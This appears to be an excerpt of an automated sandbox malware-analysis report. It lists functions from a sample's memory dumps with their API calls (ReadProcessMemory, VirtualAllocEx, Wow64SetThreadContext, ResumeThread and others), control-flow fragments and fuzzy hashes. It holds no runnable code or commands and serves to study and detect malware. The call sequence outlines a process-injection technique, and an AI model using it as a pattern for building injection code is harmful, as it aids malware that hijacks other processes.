                          control_flow_graph 288 7007c11-7007c63 291 7007c73-7007ca3 Wow64SetThreadContext 288->291 292 7007c65-7007c71 288->292 294 7007ca5-7007cab 291->294 295 7007cac-7007cdc 291->295 292->291 294->295
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07007C96
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 74dbae8ded1e526739cac9f7e886cadfb1cb7275e78655879dbbfe468e0701ed
                          • Instruction ID: 99c84386a70d5fb16e048a47911ba72b11d2c2f2155f536c7802d03e974723f0
                          • Opcode Fuzzy Hash: 74dbae8ded1e526739cac9f7e886cadfb1cb7275e78655879dbbfe468e0701ed
                          • Instruction Fuzzy Hash: C6216AB1D003099FEB10DFAAC445BEEBBF4AF48320F14842ED459A7240CB78A545CFA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 299 70082d1-7008365 ReadProcessMemory 302 7008367-700836d 299->302 303 700836e-700839e 299->303 302->303
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07008358
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 186c7f78e4b50629dabde711425c710e50d0980c656fbba327891d22758866a6
                          • Instruction ID: 5f3748cf72f4a0b26110a136c457f2d6a7a3ebfd802eeb6982811bd15b1f533c
                          • Opcode Fuzzy Hash: 186c7f78e4b50629dabde711425c710e50d0980c656fbba327891d22758866a6
                          • Instruction Fuzzy Hash: 122116B1C003599FDB10DFAAD881BEEBBF5FF48320F14882AE518A7240C7799541DBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 307 700a6fe-700a793 GetCurrentThreadId 311 700a795-700a79b 307->311 312 700a79c-700a7dd call 700a310 307->312 311->312
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0700A782
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: 2abd703d136ed2e60af670e4f6c841b635d59e2a7dfe08c63e49ac3b6633c376
                          • Instruction ID: 02b2e46c1ad42520cefbbe17b23226d65db0c6d71578ef900ae70eb144efed96
                          • Opcode Fuzzy Hash: 2abd703d136ed2e60af670e4f6c841b635d59e2a7dfe08c63e49ac3b6633c376
                          • Instruction Fuzzy Hash: B02135B59003098FDB10DF99D844ADEBBF0FB48314F10CA59D419AB352D774A944CFA2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 327 70082d8-7008365 ReadProcessMemory 330 7008367-700836d 327->330 331 700836e-700839e 327->331 330->331
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07008358
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 3c7b5dee4a73f4baceb56e9f59781bd368dd88d7df9ee0a672088a8abfe20671
                          • Instruction ID: 7d7872a8785777943b529f07455071f8a2b4b3f16b11a2a4e283a1d5ae3ab75b
                          • Opcode Fuzzy Hash: 3c7b5dee4a73f4baceb56e9f59781bd368dd88d7df9ee0a672088a8abfe20671
                          • Instruction Fuzzy Hash: 622116B1C003599FDB10DFAAC840BDEBBF5FF48310F14882AE518A7240C7799500DBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 317 7007c18-7007c63 319 7007c73-7007ca3 Wow64SetThreadContext 317->319 320 7007c65-7007c71 317->320 322 7007ca5-7007cab 319->322 323 7007cac-7007cdc 319->323 320->319 322->323
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07007C96
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 90c3cfe95695259c23ac78e7b785529ce8d191b92f4e27edcd815ea05f6e36a8
                          • Instruction ID: 0201d6d9df23866d53adfab29b43361ba5f197b858178a81372e6409a6180b1f
                          • Opcode Fuzzy Hash: 90c3cfe95695259c23ac78e7b785529ce8d191b92f4e27edcd815ea05f6e36a8
                          • Instruction Fuzzy Hash: 80211AB1D003099FDB14DFAAC445BEEBBF4AF48324F148429D519A7241C778A545CFA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 335 700acd8-700ad23 337 700ad25-700ad28 335->337 338 700ad2b-700ad2f 335->338 337->338 339 700ad31-700ad34 338->339 340 700ad37-700ad6a MessageBoxW 338->340 339->340 341 700ad73-700ad87 340->341 342 700ad6c-700ad72 340->342 342->341
                          APIs
                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0700AD5D
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: Message
                          • String ID:
                          • API String ID: 2030045667-0
                          • Opcode ID: 0bb1a3893ec42cefba7450efa1bedf7786696c14be84f12e6c57bc87a443885b
                          • Instruction ID: 198d4b31ede819f7dacfab9f02330c9be6c648f45002d2c666bb6bb2aa533514
                          • Opcode Fuzzy Hash: 0bb1a3893ec42cefba7450efa1bedf7786696c14be84f12e6c57bc87a443885b
                          • Instruction Fuzzy Hash: 2A21F3B6D0070A9FDB14CF9AD884ADEFBF5FB48320F10852AE419A7240D375A544CBA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 344 700a7ee-700a832 346 700a834-700a83c 344->346 347 700a83e-700a86e EnumThreadWindows 344->347 346->347 348 700a870-700a876 347->348 349 700a877-700a8a4 347->349 348->349
                          APIs
                          • EnumThreadWindows.USER32(?,00000000,?), ref: 0700A861
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: EnumThreadWindows
                          • String ID:
                          • API String ID: 2941952884-0
                          • Opcode ID: b8ee2f860340b02b95153242fc0e2026e657c207b6e4fed69173a350fed83386
                          • Instruction ID: c3af262862f78fdfdeeb61df77c4ceabe1fcbed54e6094f6e690dadf90aae1df
                          • Opcode Fuzzy Hash: b8ee2f860340b02b95153242fc0e2026e657c207b6e4fed69173a350fed83386
                          • Instruction Fuzzy Hash: 6C2127B1D00219DFEB14CF9AC844BEEFBF5EB88320F14842AD454A7290D778A945CFA1
                          APIs
                          • EnumThreadWindows.USER32(?,00000000,?), ref: 0700A861
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: EnumThreadWindows
                          • String ID:
                          • API String ID: 2941952884-0
                          • Opcode ID: 52523c0984290d2af6452f1a2d7ff022aa657d405694920b3916cf0869199e46
                          • Instruction ID: 8e826f081214b7631507296fb53b0d6f827072e3415ed4fd0b1ac1fe1e1fccd1
                          • Opcode Fuzzy Hash: 52523c0984290d2af6452f1a2d7ff022aa657d405694920b3916cf0869199e46
                          • Instruction Fuzzy Hash: 1321F7B1D00219DFEB14DF9AC844BEEFBF5EB88320F14842AD454A7290D778A945CFA5
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07008196
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: ec948274ea3f341490631d8ecf7d67497d34dc361e86a16541320167f6ce5714
                          • Instruction ID: 4ad41c6951b2701d5902d87b13c558b6e515b384f725a5ffb4af142e0cd05f62
                          • Opcode Fuzzy Hash: ec948274ea3f341490631d8ecf7d67497d34dc361e86a16541320167f6ce5714
                          • Instruction Fuzzy Hash: E81136B28002499FDB14DFAAC844BDEBBF5AF48320F148819E515A7250C7799541CFA1
                          APIs
                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0700AD5D
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: Message
                          • String ID:
                          • API String ID: 2030045667-0
                          • Opcode ID: 12a0e60b1addaa9c13e8cd157bb4ebdd2e02b5cd98a0a952460bd17d665570e7
                          • Instruction ID: d8c02147d1b8dd369f54c21cf114cb30679af4a6924f803ad82a70f0f1501e27
                          • Opcode Fuzzy Hash: 12a0e60b1addaa9c13e8cd157bb4ebdd2e02b5cd98a0a952460bd17d665570e7
                          • Instruction Fuzzy Hash: 3F210FB6D007099FDB14CF9AD884ADEFBF5FB48320F10852AE819AB240C375A544CBA1
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07008196
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: a18a540b82c1e84f896d4513b10ad1e72d74539ca5ce80a9260752fde8dba7e1
                          • Instruction ID: 0c5f562acef2823135d96c3d8c96e3e0e0616fcde194aa7e2d67d6d5774ababc
                          • Opcode Fuzzy Hash: a18a540b82c1e84f896d4513b10ad1e72d74539ca5ce80a9260752fde8dba7e1
                          • Instruction Fuzzy Hash: 081126729002499FDB10DFAAC844BDEBBF5AF48320F148819E519A7250C775A540CBA1
                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 08458caa612064e425bee15036f21f05eca78f16a0cda5c4010dad9eaf239f02
                          • Instruction ID: 2c2dc0e4f2f1c8445b3ea476b4603077fb788ffcfb1330ca1be474214c06706a
                          • Opcode Fuzzy Hash: 08458caa612064e425bee15036f21f05eca78f16a0cda5c4010dad9eaf239f02
                          • Instruction Fuzzy Hash: FA1158B1D00349CFEB24DFAAD8447DEBBF4AF88324F24881AD459A7240C7796945CBA4
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 0700B0E5
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 3b645a3f637fbdc455d326bf4655ea85304d85bc34c9586fc2708310b79b630e
                          • Instruction ID: d1b9d994d4c08270ba4993983f261da759511937a5320dd7df220178239cc689
                          • Opcode Fuzzy Hash: 3b645a3f637fbdc455d326bf4655ea85304d85bc34c9586fc2708310b79b630e
                          • Instruction Fuzzy Hash: F911F2B6800349DFDB20CF9AD884BDEBBF8FB48320F108819E558A7640C375A944CFA1
                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: fd7066a59aacc742fd6fe0f452aa8a5bd48b4526299cf08bf1651a5d5d516109
                          • Instruction ID: 97477b113c36390c03997dfafeb44ed2489552b39bfd8bf9a17ce1ffc10d46f9
                          • Opcode Fuzzy Hash: fd7066a59aacc742fd6fe0f452aa8a5bd48b4526299cf08bf1651a5d5d516109
                          • Instruction Fuzzy Hash: 65113AB1D003498FDB10DFAAC8457DEFBF4AB88220F248819D419A7240C779A540CBA5
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 07009F0D
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: Initialize
                          • String ID:
                          • API String ID: 2538663250-0
                          • Opcode ID: 77bd9ad67164f49a4807ec531ae1eaa383f2feccfb295d872dfeec12dd14b6ee
                          • Instruction ID: 016e98c3d5302a01e4e0d68b905879889a47c756312d39f8430e97fd05f229d1
                          • Opcode Fuzzy Hash: 77bd9ad67164f49a4807ec531ae1eaa383f2feccfb295d872dfeec12dd14b6ee
                          • Instruction Fuzzy Hash: FE1100B1D14748DFDB20DFAAD444BDEBBF8EB48220F208559E518A7341C379A944CFA5
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 0700B0E5
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 0fdb64300aa78870ab1c6c6effadedee91d8a50de69cb274fb2e6b56ac018f47
                          • Instruction ID: 3cb545eac9f89bf8b9ed0a84fd95b0e5a6222fbaa50a8b3727c2fc10451902f8
                          • Opcode Fuzzy Hash: 0fdb64300aa78870ab1c6c6effadedee91d8a50de69cb274fb2e6b56ac018f47
                          • Instruction Fuzzy Hash: 2F11D3B5800349DFDB20DF9AD845BDEBBF8FB48320F108819D558A7640C375A944CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823119163.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4fb0000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID: B
                          • API String ID: 0-1255198513
                          • Opcode ID: 946476297bb4e1005f2f9efde169bc210727964a5161056cfe49e832764e2225
                          • Instruction ID: 706f009d9b07309716bce920c75b5ca9a1e91425de14b2b1acedc0563ec9ed1d
                          • Opcode Fuzzy Hash: 946476297bb4e1005f2f9efde169bc210727964a5161056cfe49e832764e2225
                          • Instruction Fuzzy Hash: A2D0A77160A348DBF700DBA6D518BEB776CD747306F00108CD49E132419B746E00E5D5
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4140c35168beb2930603f67e574a18686b50a3a57e5e86c31b659bf90c29d175
                          • Instruction ID: f573c9ac8f44ddc146f45690f0f330ad82035346691b8659da346290d8af7140
                          • Opcode Fuzzy Hash: 4140c35168beb2930603f67e574a18686b50a3a57e5e86c31b659bf90c29d175
                          • Instruction Fuzzy Hash: 9A62EEB0D02B49CFD7746FB494983AE76A1BB52304F504D1EE0AFCE380DB78A4469B56
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0dba4f4de662090251c4581488f1a94484f5833a2c7dc9dbb302b452f97812b6
                          • Instruction ID: 6e3c1997738bccd48521da49500e452d3d9c911b011ff6082dbb14211203e3b8
                          • Opcode Fuzzy Hash: 0dba4f4de662090251c4581488f1a94484f5833a2c7dc9dbb302b452f97812b6
                          • Instruction Fuzzy Hash: 672238F0906B4A8FD7746BA4858829FB690BB15310F204D5BD0FF8E355D735A08BAB4A
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b304d6328015100e46171efa668873f26ff67bc61f12d830957d7fc6766163b
                          • Instruction ID: 3268f1775cdffb9bd1d906dd9f1004279c938c4f6e3c20bf9c22c1eb91eea9e2
                          • Opcode Fuzzy Hash: 5b304d6328015100e46171efa668873f26ff67bc61f12d830957d7fc6766163b
                          • Instruction Fuzzy Hash: C791ED71A01308DFDB18DFA9E8446AEBBF2FF85310F11846AD446A7341DB34A846CFA5
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 58e265750aa0283ce6ae7b917730a2afff1a811e09e9eec435359bbabd81a10b
                          • Instruction ID: 3f00c7b3323c18dfa89088a55f793762901959b12d9a489b6109811a2c018f4d
                          • Opcode Fuzzy Hash: 58e265750aa0283ce6ae7b917730a2afff1a811e09e9eec435359bbabd81a10b
                          • Instruction Fuzzy Hash: 458167B1E003189FDB04DFA9C8546EEBBF2BF89300F14852AE40AEB351DB745945CBA1
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fa7c9e12ca7cc5d1352d70ebe5eafc6cbe50eeef39285de828d298f3bce1f7ef
                          • Instruction ID: 7436ca06e0e2cc2a7c54923793fe8a264bbce8957a80e8eb48e228500e718b99
                          • Opcode Fuzzy Hash: fa7c9e12ca7cc5d1352d70ebe5eafc6cbe50eeef39285de828d298f3bce1f7ef
                          • Instruction Fuzzy Hash: 5C716D74A01208EFDB15DFA9D884DAEBBB6FF48714B114499F902AB361DB31EC91CB50
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25f6282871290cf6836ff7d3e87f071971693712de5b068abf1cd2340b6ed52e
                          • Instruction ID: 7b76521a89d504d7961fed65ce83268441e765d9d12584e134d4b3a614bd4707
                          • Opcode Fuzzy Hash: 25f6282871290cf6836ff7d3e87f071971693712de5b068abf1cd2340b6ed52e
                          • Instruction Fuzzy Hash: 9C5159307002059FDB25EF69C894BAAB7EAFF89704F1444A9E50ADB3A4DB75EC41CB50
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa3ec824664645e37b776f3a0d13fac22240a79b66c5c13691cc82e209a222f7
                          • Instruction ID: b42defce1553c42b6507d4ea7b135946fe89a91e6f1c8d1042970a4944feefa2
                          • Opcode Fuzzy Hash: aa3ec824664645e37b776f3a0d13fac22240a79b66c5c13691cc82e209a222f7
                          • Instruction Fuzzy Hash: 5C518B307002019FDB15EFA8C894AAABBF6FF89304F1544AAD50ADB3A1DB75EC45CB51
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b1df21400d468a093405f07b6286d9c536a740041bc6b82971b7027ec4a0d66
                          • Instruction ID: 79719f8e3ec64cc99b78e97729a9e1faa4b52b4a1f68cd355216c98d59fd2b69
                          • Opcode Fuzzy Hash: 6b1df21400d468a093405f07b6286d9c536a740041bc6b82971b7027ec4a0d66
                          • Instruction Fuzzy Hash: 8841D0B1E043089FEB14DFAAD844BAFBBF9EF89210F14841AE515E7341D774A805CBA5
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bffe34511b8c1e46a76d58180c2d26a9c849c2e361d020099cc775add8a13938
                          • Instruction ID: 9dd44165adc9fd9a563adbef91c98df2a5c4ea400b61a7e42d9a3d91efe7aea4
                          • Opcode Fuzzy Hash: bffe34511b8c1e46a76d58180c2d26a9c849c2e361d020099cc775add8a13938
                          • Instruction Fuzzy Hash: 47519038641208EFCB14DF68D494DAEBBB6FF49725B114499F902AB361DB31EC92CB50
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 969abf684f472ae0db2bbd2b545338fcab46463a8ac8ca537acf2c283389524b
                          • Instruction ID: 02ed0b552378f8d6ca2d02f1c643e8b379c11794e78cb9f81b1d795e237ce658
                          • Opcode Fuzzy Hash: 969abf684f472ae0db2bbd2b545338fcab46463a8ac8ca537acf2c283389524b
                          • Instruction Fuzzy Hash: 51418131E00219CBEB18FF79D4542AEBBB2EF89354F14446AC406BB381DB356985CBA1
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823119163.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4fb0000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1e3bb6c71822e52e0095c08f6bf11858f8c2b8906933dbd88dfd1af9a53681d
                          • Instruction ID: 33db8238edf649d300d5d60b35ae312066002801ee3a5a6f3959fc23eaff4a76
                          • Opcode Fuzzy Hash: c1e3bb6c71822e52e0095c08f6bf11858f8c2b8906933dbd88dfd1af9a53681d
                          • Instruction Fuzzy Hash: 67419332B44504DBEF549BABD844BEE73B1F78A300F00842AD1C66B680EB75A846DBD1
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c7e8b8cafad5209133dfdb61ed63f1e6e34832d793bed20b2425d4c5e2704b4
                          • Instruction ID: 91a778cfa6d32c96839296898b66405a75efa6745c00a0bd1c10fa75b81f5a5c
                          • Opcode Fuzzy Hash: 7c7e8b8cafad5209133dfdb61ed63f1e6e34832d793bed20b2425d4c5e2704b4
                          • Instruction Fuzzy Hash: 3A31F331A00209EFDF059FA5D8689AEBBB6FFC9304F558459E402AB354DF35AC05CB90
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c774e2b0dad286161c5db8de708400108d6fbc4d2bd6005bd2f54b239e75a7a1
                          • Instruction ID: 122fc0c3ae9f33bcb4c99d0b7638643827b013b623ed4c5871fe64ff4bfc990e
                          • Opcode Fuzzy Hash: c774e2b0dad286161c5db8de708400108d6fbc4d2bd6005bd2f54b239e75a7a1
                          • Instruction Fuzzy Hash: EC41F3B1D00308DBDB24DFE9C984ACEBBB5BF48314F248129D409BB210D7756A4ACF91
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823119163.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4fb0000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e866f6780e97f9f7e743d52ba9035707f35ceb1b6f00d61598af9f01b475bf0
                          • Instruction ID: 3b6c82d27a2dff4663036d5f9d26ae37e3369d843f00e3384ebaf4dff04cf0e2
                          • Opcode Fuzzy Hash: 8e866f6780e97f9f7e743d52ba9035707f35ceb1b6f00d61598af9f01b475bf0
                          • Instruction Fuzzy Hash: D7316AB6900308AFDB10DFAAD844ADEBBF9EB49310F00842AE449E7210D775A941CFA1
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6ea69b852b4bda0234b4ab0b3e9c5902e599015380b41b3b1e7d13b357e309f3
                          • Instruction ID: ef285b98b85c1d5528d98ad7e3eb5fa807d52545c62196fe077e414ded296653
                          • Opcode Fuzzy Hash: 6ea69b852b4bda0234b4ab0b3e9c5902e599015380b41b3b1e7d13b357e309f3
                          • Instruction Fuzzy Hash: A941D2B1D00309DBDB24DFA9C984ACEFBB5BF49304F24846AD409BB214DB756A49CF91
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9be0123f58f6e036d358fa9e117c2ac5697f9c1bc5988e34375dc5f5553bede9
                          • Instruction ID: 95aae3d5ca72af4016d95184ee43b5e14b7ff89cfc8782f7e56537e47aa6199e
                          • Opcode Fuzzy Hash: 9be0123f58f6e036d358fa9e117c2ac5697f9c1bc5988e34375dc5f5553bede9
                          • Instruction Fuzzy Hash: 4E316431E00215DBEB18FF7AC4542AE77A2EF88354F14887EC402AB381DF75A945DBA5
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d36a907cb521d434bde29fbe2762dad4e913b3ebd00af15a2b91b4bc4703a231
